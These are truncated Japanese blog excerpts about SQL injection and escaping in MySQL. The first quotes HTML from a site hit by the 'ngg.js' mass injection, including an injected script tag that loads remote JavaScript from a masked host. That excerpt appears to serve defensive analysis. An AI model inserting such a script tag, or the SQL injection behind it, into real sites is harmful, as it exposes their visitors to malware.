うわさのngg.jsを調べていたらこんな表示のサイトを見かけました。 HTMLソースは以下の通り 宮城県、福島県、山形県、岩手県、秋田県<script src=http://www.XXXXXX.com/ngg.js></script> おそらく、SQLインジェクションによりSCRIPT要素を埋め…

SQLのエスケープと聞いてやってきましたよ。2008-07-10 - T.Teradaの日記から 例えば、「\%foo」から始まる文字列を検索する場合には、どのようなSQL文を書けばよいのでしょうか。 条件は以下の通りです。 1. DBMSソフトはMySQL 2. ESCAPE節は使わない 【中…

Eiji James Yoshidaの記録を参考に、3つのブログのランキングをタイトル毎に並べてみた(2008年6月)。 1位そろそろSQLエスケープに関して一言いっとくか - SQLのエスケープ再考 2位SQLインジェクション対策 - SQLエスケープにおける「\」の取り扱い 3位4月か…